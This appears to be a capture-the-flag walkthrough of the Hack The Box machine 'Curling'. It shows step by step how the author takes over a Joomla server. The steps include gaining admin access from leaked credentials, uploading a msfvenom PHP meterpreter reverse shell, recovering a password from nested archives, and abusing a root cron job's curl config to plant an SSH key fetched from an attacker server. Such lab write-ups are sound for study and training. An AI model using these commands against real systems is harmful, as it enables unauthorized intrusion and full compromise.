- The username for the Joomla site is
Floriswhich is the author of posts. - The password is a variant of a word on the main page:
Curling2018! - On the Joomla admin page we can inject a meterpreter reverse shell in the
index.phpfile of the template in-use - After getting a shell, we can download a password backup file, which is compressed several times, and contains the password for user
floris - User
floriscontrols ainputfile used bycurlrunning in a root cronjob. We can change the config file so that cURL gets our SSH public key and saves it into the root ssh directory
1
echo "10.10.10.150 curling.htb" >> /etc/hosts
Nmap
Start with a full TCP port scan which only found a webserver running on port 80 and ssh on 22 so not much to really work with.
1
2
3
4
5
6
7
8
9
10
11
12
13
# Nmap 7.70 scan initiated Tue Dec 11 13:41:24 2018 as: nmap -sSV -p0- -oA nmap_tcp_full curling.htb
Nmap scan report for htb.curling (10.10.10.150)
Host is up, received user-set (0.038s latency).
Scanned at 2018-12-11 13:41:59 GMT for 173s
Not shown: 65534 closed ports
Reason: 65534 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.44 seconds
Joomla
Running nikto and joomscan didnt return anything of intreast. So started to have a mooch about noticing the following:
-
The site name is Cewl Curling site!, a hint to use the CeWL tool to scrape a website generating wordlist from it.
-
The first post reveals the username for the administrator:
Floris
Next had a look at the source code and noticed the following comment
checking /secret.txt reveals a base64 string which i decoded to reveal Curling2018!
Username: Floris Password: Curling2018!
Now can login to the admin page using the creds above - http://curling.htb/administrator/index.php
Getting a Shell
Time to get a shell
msfvenom was used to generate a simple php shell
1
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.210 LPORT=4446 > php-meterpreter-staged-reverse-tcp-4666.php
The file upload functionality on the main page was abused to upload the shell sucessfully as it allows php files.
setup and run the msf handler
1
2
3
4
5
6
7
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 4446
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.210:4446
Clicking on the link in the upload dialogue establishes the shell
http://10.10.10.150/images/php-meterpreter-staged-reverse-tcp-4666.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
[*] Sending stage (38247 bytes) to 10.10.10.150
[*] Meterpreter session 1 opened (10.10.14.210:4666 -> 10.10.10.150:42196) at 2018-12-11 16:43:13 +0000
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter php/linux www-data (33) @ curling 10.10.14.210:4666 -> 10.10.10.150:42196 (10.10.10.150)
msf exploit(multi/handler) > sessions -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : curling
OS : Linux curling 4.15.0-22-generic #24-Ubuntu SMP Wed May 16 12:15:17 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter >
Boom we get a shell as www-data :P
Getting User
unable to read user.txt due to insufficient permissons so need to esculate.
looking around the system there is a intreasting file
/home/floris/password_backup
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
000000f0: 819b bb48 ...H
This looks like a hex dump
copied the file of the box and used xxd to convert the file back into binary format
1
2
3
4
5
6
7
root@kali2:~/challenges/hackthebox/curling# xxd -r password_backup data.out
root@kali2:~/challenges/hackthebox/curling# file data.out
data.out: bzip2 compressed data, block size = 900k
root@kali2:~/challenges/hackthebox/curling# cat data.out
BZh91AY&SY���H���A��P)ava�:4N���nT#�@%�`
"��n� ��z�@�i�4hdi���9�h�Q�dh����4i�5n���Jh��*��}y.�<~�x�> �sVT�zH�ߢ�1�V��`F���s
ۇ7j:X�dR��k�� ���)p�7۫;���9��PC�Y�P �HB��* ��G� �U@r�rE8P����H#
bzip2
the file was confirmed to be a bzip2 so let’s decompress it…
1
2
root@kali2:~/challenges/hackthebox/curling# bzip2 -d data.out
bzip2: Can't guess original name for data.out -- using data.out.out
gzip
another compressed file inside
1
2
3
4
5
6
root@kali2:~/challenges/hackthebox/curling# file data.out.out
data.out.out: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix, original size 141
root@kali2:~/challenges/hackthebox/curling# mv data.out.out data.gz
root@kali2:~/challenges/hackthebox/curling# gunzip data.gz
root@kali2:~/challenges/hackthebox/curling# file data
download: bzip2 compressed data, block size = 900k
bzip…again
and another…:O
1
2
3
4
root@kali2:~/challenges/hackthebox/curling# mv data password.bz2
root@kali2:~/challenges/hackthebox/curling# bzip2 -d password.bz2
root@kali2:~/challenges/hackthebox/curling# file password
password: POSIX tar archive (GNU)
tar
tar - it keeps on going
1
2
3
4
root@kali2:~/challenges/hackthebox/curling# tar xvf password
password.txt
root@kali2:~/challenges/hackthebox/curling# cat password.txt
5d<wdCbdZu)|hChXll
woop! got there in the end
Now on the box su was used to swtich over to floris and get the user flag.
1
2
3
4
5
6
7
python3 -c 'import pty;pty.spawn("/bin/sh")'
$ su -l floris
su -l floris
Password: 5d<wdCbdZu)|hChXll
floris@curling:~$ cat user.txt
cat user.txt
65dd1d...
Privesc to Root
First, let’s upload our ssh key so we don’t have to rely on that meterpreter shell and get in nice and easy
1
2
3
4
floris@curling:~$ mkdir .ssh
mkdir .ssh
floris@curling:~$ echo "ssh-rsa AAAAB...DhscPOtelvd root@kali2" > .ssh/authorized_keys
<cPOtelvd root@kali2" > .ssh/authorized_keys
In admin-area folder, there are two files with a timestamp that keeps refreshing every few minutes:
1
2
3
4
5
6
7
8
floris@curling:~/admin-area$ ls -la
total 12
drwxr-x--- 2 root floris 4096 May 22 19:04 .
drwxr-xr-x 7 floris floris 4096 Oct 27 20:39 ..
-rw-rw---- 1 root floris 25 Oct 27 20:40 input
-rw-rw---- 1 root floris 0 Oct 27 20:40 report
floris@curling:~/admin-area$ date
Sat Oct 27 20:40:44 UTC 2018
looks like there could be a cron job running as root. let’s confirm this by running a simple ps command in a bash loop:
1
2
3
4
5
6
7
8
9
floris@curling:~/admin-area$ while true; do ps waux | grep report | grep -v "grep --color"; done
root 9225 0.0 0.0 4628 784 ? Ss 20:44 0:00 /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9227 0.0 0.4 105360 9076 ? S 20:44 0:00 curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9225 0.0 0.0 4628 784 ? Ss 20:44 0:00 /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9227 0.0 0.4 105360 9076 ? S 20:44 0:00 curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9225 0.0 0.0 4628 784 ? Ss 20:44 0:00 /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9227 0.0 0.4 105360 9076 ? S 20:44 0:00 curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9225 0.0 0.0 4628 784 ? Ss 20:44 0:00 /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
root 9227 0.0 0.4 105360 9076 ? S 20:44 0:00 curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
As suspected, a cronjob executes curl using a input config file which we can write to.
We will change the file to fetch our SSH public key and save it into root’s authorized_keys file:
1
2
3
4
floris@curling:~/admin-area$ echo -ne 'output = "/root/.ssh/authorized_keys"\nurl = "http://10.10.14.23/key.txt"\n' > input
floris@curling:~/admin-area$ cat input
output = "/root/.ssh/authorized_keys"
url = "http://10.10.14.23/key.txt"
When the cronjob runs, it fetches our public key:
1
2
3
root@kali2:~/challenges/hackthebox/curling# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.150 - - [11/Dec/2018 16:52:56] "GET /key.txt HTTP/1.1" 200 -
We can now SSH in as root:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@kali2:~/challenges/hackthebox/curling# ssh root@curling.htb
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-22-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Oct 27 20:47:15 UTC 2018
System load: 0.13 Processes: 181
Usage of /: 46.3% of 9.78GB Users logged in: 1
Memory usage: 22% IP address for ens33: 10.10.10.150
Swap usage: 0%
=> There is 1 zombie process.
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
root@curling:~# cat root.txt
82c198...